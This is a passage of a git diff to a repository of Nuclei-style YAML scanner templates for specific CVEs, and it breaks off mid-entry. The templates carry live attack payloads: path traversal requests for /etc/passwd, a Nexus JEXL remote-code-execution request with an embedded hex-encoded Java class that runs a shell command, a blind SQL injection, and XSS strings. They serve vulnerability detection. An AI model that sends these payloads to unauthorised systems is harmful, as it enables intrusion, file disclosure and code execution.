CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-5418 + tags: cve,cve2019,rails,lfi,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Accept: ../../../../../../../../etc/passwd{{ + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body + +# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2019-7238.yaml b/poc/cve/cve-2019-7238.yaml new file mode 100644 index 0000000000..dcc8e406c2 --- /dev/null +++ b/poc/cve/cve-2019-7238.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-7238 + +info: + name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + reference: + - https://github.com/jas502n/CVE-2019-7238 + - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7238 + tags: cve,cve2019,nexus,rce + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/cve-2019-8449.yaml b/poc/cve/cve-2019-8449.yaml index 901f583d18..fbc411d863 100644 --- a/poc/cve/cve-2019-8449.yaml +++ b/poc/cve/cve-2019-8449.yaml @@ -2,10 +2,19 @@ id: CVE-2019-8449 info: name: JIRA Unauthenticated Sensitive Information Disclosure - author: Harsh Bothra + author: harshbothra_ severity: medium - -# source:- https://www.doyler.net/security-not-included/more-jira-enumeration + description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + reference: + - https://www.doyler.net/security-not-included/more-jira-enumeration + - https://jira.atlassian.com/browse/JRASERVER-69796 + - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 + tags: cve,cve2019,atlassian,jira,disclosure requests: - method: GET diff --git a/poc/cve/cve-2019-8982.yaml b/poc/cve/cve-2019-8982.yaml index dfa59f24c3..abd568261b 100644 --- a/poc/cve/cve-2019-8982.yaml +++ b/poc/cve/cve-2019-8982.yaml @@ -1,8 +1,19 @@ id: CVE-2019-8982 + info: - name: Wavemaker Studio 6.6 LFI/SSRF + name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery author: madrobot - severity: high + severity: critical + description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." + reference: + - https://www.exploit-db.com/exploits/45158 + - https://nvd.nist.gov/vuln/detail/CVE-2019-8982 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2019-8982 + cwe-id: CWE-918 + tags: cve,cve2019,wavemaker,lfi,ssrf requests: - method: GET @@ -15,5 +26,8 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body + + +# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/cve-2019-9922.yaml b/poc/cve/cve-2019-9922.yaml index 9860c82699..caff895c05 100644 --- a/poc/cve/cve-2019-9922.yaml +++ b/poc/cve/cve-2019-9922.yaml @@ -1,27 +1,40 @@ id: CVE-2019-9922 + info: - name: JE Messenger 1.2.2 Joomla - Directory Traversal + name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion author: 0x_Akoko severity: high - description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. + description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application. + remediation: | + Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://www.cvedetails.com/cve/CVE-2019-9922 + - https://extensions.joomla.org/extension/je-messenger/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9922 cwe-id: CWE-22 - tags: cve,cve2019,joomla,messenger,lfi + epss-score: 0.01171 + epss-percentile: 0.83428 + cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: harmistechnology + product: je_messenger + framework: joomla\! + tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\! -requests: +http: - method: GET path: - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -29,3 +42,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-0618.yaml b/poc/cve/cve-2020-0618.yaml index b123e8720c..db74d9daff 100644 --- a/poc/cve/cve-2020-0618.yaml +++ b/poc/cve/cve-2020-0618.yaml @@ -1,28 +1,47 @@ id: CVE-2020-0618 info: - name: RCE in SQL Server Reporting Services + name: Microsoft SQL Server Reporting Services - Remote Code Execution author: joeldeleep severity: high + description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. + reference: + - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ + - https://github.com/euphrat1ca/CVE-2020-0618 + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618 + - http://packetstormsecurity.com/files/156707/SQL-Server-Reporting-Services-SSRS-ViewState-Deserialization.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-0618 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-0618 + cwe-id: CWE-502 + epss-score: 0.97439 + epss-percentile: 0.99944 + cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: sql_server + tags: cve,cve2020,rce,packetstorm,microsoft - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[1] below. - # This template works by guessing user ID. - - # References: - # - [1] https://github.com/euphrat1ca/CVE-2020-0618 - # - [2] https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - -requests: +http: - method: GET path: - "{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "view report" - part: body \ No newline at end of file + + - type: status + status: + - 200 +# digest: 4a0a0047304502207796ce5eaeb19be44756799ab9d240f55cdec21a63358cf9caa45d531049dae8022100f4079b7480e397faab25a83a473d2ce4982b3ca232f2099abc0fd57970acc66e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-11529.yaml b/poc/cve/cve-2020-11529.yaml index ebb90a2a7b..02c6e86d2e 100644 --- a/poc/cve/cve-2020-11529.yaml +++ b/poc/cve/cve-2020-11529.yaml @@ -1,28 +1,31 @@ id: CVE-2020-11529 info: - name: Grav 1.7 Open Redirect + name: Grav <1.7 - Open Redirect author: 0x_Akoko severity: medium - description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x. + description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. reference: - https://github.com/getgrav/grav/issues/3134 - https://www.cvedetails.com/cve/CVE-2020-11529 - tags: cve,cve2019,redirect,grav.getgrav + - https://nvd.nist.gov/vuln/detail/CVE-2020-11529 + - https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-11529 cwe-id: CWE-601 + tags: cve,cve2019,redirect,grav,getgrav requests: - method: GET - path: - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' part: header + +# Enhanced by mp on 2022/05/04 diff --git a/poc/cve/cve-2020-11530.yaml b/poc/cve/cve-2020-11530.yaml new file mode 100644 index 0000000000..5b39e49bf0 --- /dev/null +++ b/poc/cve/cve-2020-11530.yaml @@ -0,0 +1,50 @@ +id: CVE-2020-11530 + +info: + name: WordPress Chop Slider 3 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a + - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress + - https://idangero.us/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-11530 + - http://seclists.org/fulldisclosure/2020/May/26 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-11530 + cwe-id: CWE-89 + epss-score: 0.83664 + epss-percentile: 0.98377 + cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: idangero + product: chop_slider + framework: wordpress + tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero + +http: + - raw: + - | + @timeout 10s + GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/javascript")' + - 'contains(body, "$(document).ready(function()")' + condition: and +# digest: 4a0a00473045022040f98bb17cb9dd9f543c8f2a14720c7f926c37a4822e9727295abb4bd8b955aa022100c62613f04ac8afcfd750afc1188d0f3f04a2461b90b206d23c4243070659aedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-11854.yaml b/poc/cve/cve-2020-11854.yaml new file mode 100644 index 0000000000..ee377b4cdd --- /dev/null +++ b/poc/cve/cve-2020-11854.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-11854 + +info: + name: Micro Focus UCMDB - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3. + reference: + - http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html + - https://softwaresupport.softwaregrp.com/doc/KM03747658 + - https://softwaresupport.softwaregrp.com/doc/KM03747657 + - https://softwaresupport.softwaregrp.com/doc/KM03747854 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11854 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 + tags: cve,cve2020,ucmdb,rce,microfocus + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2020-13121.yaml b/poc/cve/cve-2020-13121.yaml index 7f8d07ee1b..cd7764f649 100644 --- a/poc/cve/cve-2020-13121.yaml +++ b/poc/cve/cve-2020-13121.yaml @@ -1,28 +1,46 @@ id: CVE-2020-13121 info: - name: Submitty 20.04.01 - Open redirect + name: Submitty <= 20.04.01 - Open Redirect author: 0x_Akoko severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - tags: cve,cve2020,redirect,submitty + - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 + epss-score: 0.00235 + epss-percentile: 0.60944 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos,rcos -requests: - - method: GET +http: + - raw: + - | + POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/authentication/login - path: - - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-13158.yaml b/poc/cve/cve-2020-13158.yaml index 5a8b77b70b..758e2c7ab3 100644 --- a/poc/cve/cve-2020-13158.yaml +++ b/poc/cve/cve-2020-13158.yaml @@ -1,27 +1,41 @@ id: CVE-2020-13158 + info: - name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal + name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion author: 0x_Akoko severity: high - description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. + description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/InfoSec4Fun/CVE-2020-13158 - - https://www.cvedetails.com/cve/CVE-2020-13158 + - https://sourceforge.net/projects/artica-squid/files/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13158 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/soosmile/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - tags: cve,cve2020,artica,lfi + epss-score: 0.96791 + epss-percentile: 0.99659 + cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* + metadata: + max-request: 1 + vendor: articatech + product: artica_proxy + tags: cve,cve2020,artica,lfi,articatech -requests: +http: - method: GET path: - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -29,3 +43,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-13483.yaml b/poc/cve/cve-2020-13483.yaml new file mode 100644 index 0000000000..82a960c043 --- /dev/null +++ b/poc/cve/cve-2020-13483.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-13483 + +info: + name: Bitrix24 through 20.0.0 allows XSS + author: pikpikcu,3th1c_yuk1 + severity: medium + description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + reference: + - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 + - https://twitter.com/brutelogic/status/1483073170827628547 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 + tags: cve,cve2020,xss,bitrix + +requests: + - method: GET + path: + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '
*/)});function __MobileAppList(){alert(1)}//' + - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" + condition: or + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-13937.yaml b/poc/cve/cve-2020-13937.yaml index a48b165d9a..53149fd717 100644 --- a/poc/cve/cve-2020-13937.yaml +++ b/poc/cve/cve-2020-13937.yaml @@ -1,12 +1,10 @@ id: CVE-2020-13937 info: - name: Apache Kylin - Exposed Configuration File + name: Apache Kylin Exposed Configuration File author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. - remediation: | - Secure the configuration file by restricting access permissions and implementing proper access controls. reference: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html @@ -16,38 +14,31 @@ info: cvss-score: 5.3 cve-id: CVE-2020-13937 cwe-id: CWE-922 - epss-score: 0.97368 - epss-percentile: 0.99884 - cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: apache - product: kylin tags: cve,cve2020,apache -http: +requests: - method: GET path: - "{{BaseURL}}/kylin/api/admin/config" - headers: - Content-Type: "application/json" + Content-Type: application/json matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word - part: header words: - "application/json" + part: header - type: word - part: body words: - config - kylin.metadata.url condition: and + part: body - - type: status - status: - - 200 -# digest: 490a0046304402203e2604d729ad3b0bdb557657efc64a99178606b4f5fed9949f0281070e45b61e02203ee30c0ba28d8851fa7d7a148d602915e6bba4899458a7b893eff71d1c433057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/28 diff --git a/poc/cve/cve-2020-13942.yaml b/poc/cve/cve-2020-13942.yaml index 44ed589718..c7148c6357 100644 --- a/poc/cve/cve-2020-13942.yaml +++ b/poc/cve/cve-2020-13942.yaml @@ -1,25 +1,32 @@ id: CVE-2020-13942 info: - name: Apache Unomi Remote Code Execution + name: Apache Unomi <1.5.2 - Remote Code Execution author: dwisiswant0 severity: critical description: | - 